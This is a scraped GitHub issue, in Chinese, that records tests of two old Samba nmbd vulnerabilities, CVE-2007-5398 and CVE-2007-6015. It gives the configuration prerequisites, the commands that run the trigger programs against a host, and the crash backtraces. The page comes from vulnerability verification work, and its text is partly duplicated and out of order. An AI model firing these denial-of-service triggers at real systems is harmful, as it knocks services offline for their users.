You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
while true; do python CVE-2007_5398-trigger.py --host 192.168.0.101; echo ...;sleep 2;done
期望的结果:
当运行到第二遍后收到如下信息说明nmbd服务已经崩溃
$ while true; do python CVE-2007_5398-trigger.py --host 192.168.0.101; echo ...;sleep 2;done
...
...
Traceback (most recent call last):
File "CVE-2007_5398-trigger.py", line 166, in <module>
main(sys.argv[1:])
File "CVE-2007_5398-trigger.py", line 163, in main
exploit.run()
File "CVE-2007_5398-trigger.py", line 141, in run
self.SendPackets(packets)
File "CVE-2007_5398-trigger.py", line 133, in SendPackets
skt.send(packet)
socket.error: [Errno 111] Connection refused
nmbd端输出如下:
INTERNAL ERROR: Signal 11 in pid 7501 (3.0.25b)
Please read the Trouble-Shooting section of the Samba3-HOWTO
From: http://www.samba.org/samba/docs/Samba3-HOWTO.pdf
===============================================================
smb_panic: clobber_region() last called from [name_to_unstring(58)]
PANIC (pid 7501): internal error
BACKTRACE: 12 stack frames:
#0 nmbd(log_stack_trace+0x29) [0xb77105fc]
#1 nmbd(smb_panic+0xe4) [0xb7710793]
#2 nmbd(fault_setup+0) [0xb76fd03c]
#3 [0xb7645400]
#4 nmbd(+0x84e12) [0xb76e8e12]
#5 nmbd(debug_nmb_packet+0x1f8) [0xb76e917a]
#6 nmbd(reply_netbios_packet+0x67e) [0xb769928a]
#7 nmbd(wins_process_name_query_request+0x5be) [0xb76a4aef]
#8 nmbd(run_packet_queue+0x645) [0xb76999ba]
#9 nmbd(main+0xab4) [0xb768ab5f]
#10 /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6) [0xb72d1e46]
#11 nmbd(+0x24d51) [0xb7688d51]
smb_panic(): calling panic action [/usr/share/samba/panic-action 7501]
smb_panic(): action returned status 0
dumping core in /opt/samba-3.0.25b/var/cores/nmbd
[1] 7501 abort (core dumped) nmbd -i -S -M single -d 1
$ ./CVE-2007_6015-trigger AAAA 192.168.0.101
smb_mailslot() POC by asmx86@gmail.com
[*] packet sent
期望的结果:
运行一下程序来检测服务是否扔在运行:
$ bin/nmblookup -d10 -A 192.168.0.101
Looking up status of 192.168.0.101
Sending a packet of len 50 to (192.168.0.101) on port 137
Sending a packet of len 50 to (192.168.0.101) on port 137
No reply from 192.168.0.101
此时表明服务已经崩溃。
服务器端的错误日志如下:
smb_panic: clobber_region() last called from [make_nmb_name(863)]
PANIC (pid 9215): internal error
BACKTRACE: 5 stack frames:
#0 nmbd(log_stack_trace+0x29) [0xb77275fc]
#1 nmbd(smb_panic+0xe4) [0xb7727793]
#2 nmbd(fault_setup+0) [0xb771403c]
#3 [0xb765c400]
#4 nmbd(send_mailslot+0x179) [0xb76b2320]
smb_panic(): calling panic action [/usr/share/samba/panic-action 9215]
smb_panic(): action returned status 0
dumping core in /opt/samba-3.0.25b/var/cores/nmbd
[1] 9215 abort (core dumped) nmbd -i -S -M single -d 1
The text was updated successfully, but these errors were encountered:
CVE-2007-5398
要利用这个CVE,需要满足如下条件:
设置smb.conf
wins support = yes
测试方法如下:
启动nmbd
nmbd -i -S -M single -d 1
运行trigger
期望的结果:
当运行到第二遍后收到如下信息说明nmbd服务已经崩溃
nmbd端输出如下:
如果满足以上结果,说明存在该漏洞。
测试3台机器,均没有触发。
CVE-2007-6015
测试本CVE需要满足如下条件:
设置smb.conf如下:
domain logons = yes
测试方法如下:
编译
gcc CVE-2007_6015-trigger.c -o CVE-2007_6015-trigger
启动nmbd
gcc CVE-2007_6015-trigger.c -o CVE-2007_6015-trigger
查询目标机器的netbios name
其中的AAAA即为192.168.0.101的bios name
运行trigger
期望的结果:
运行一下程序来检测服务是否扔在运行:
此时表明服务已经崩溃。
服务器端的错误日志如下:
The text was updated successfully, but these errors were encountered: